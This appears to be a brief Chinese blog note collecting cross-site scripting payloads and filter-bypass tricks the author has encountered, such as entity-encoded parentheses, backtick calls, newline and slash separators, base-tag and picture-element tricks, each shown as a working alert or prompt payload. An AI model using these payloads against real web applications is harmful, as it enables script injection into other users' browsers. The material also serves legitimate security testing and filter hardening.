文章目录
  1. 1. 记录碰到过的XSS
  2. 2. 部分Reference

记录碰到过的XSS

序号乱了,算了

  1. ()=被过滤 实体编码
1
2
3
<svg><script>alert&#40/1/&#41</script>      // Works With All Browsers
( is html encoded to &#40
) is html encoded to &#41
  1. 浏览器Prasing 先闭合再找新标签
1
<INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
  1. 1
    2
    3
    <input value="'输出点'" type="text">
    XSS_payload= "type=&#105;&#109;&#97;&#103;&#101; src onerror
    ="prompt(1)

x———onerror和=之间换行仍然可以解析,———-可以绕过正则———

  1. 1
    <input type="text" autofocus=alert(/xss/)>
  2. chrome base标签,不可覆盖

1
<base href="javascript:\"><a href="//%0aalert(1);//">Click Me</a>
  1. img source可分开写
1
<picture><source srcset=1><img onerror=alert(1)>
  1. —————-ES6 神招 backtick ` 直接代替()——————–
1
<script>alert`1`</script>
  1. Chrome Only
1
2
<img src ?itworksonchrome?\/onerror = alert(1)>  
<img/src/onerror=alert(1)>

13.

1
<svg/onload=alert/**/(1)>
  1. 1
    <svg onload=alert(1)>
  2. JS中

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    (
    function()
    {

    alert(1)
    }
    )() //OK

    alert
    (1) //OK

    aler
    t(1) //aler Not defined
  3. img利用

    1
    2
    3
    <p class="comment" title=""><img src="></p>
    <p class="comment" title=""onerror='/*"></p>
    <p class="comment" title="*/prompt(1)'">
    </p>

部分Reference

核总
hookjoy

文章目录
  1. 1. 记录碰到过的XSS
  2. 2. 部分Reference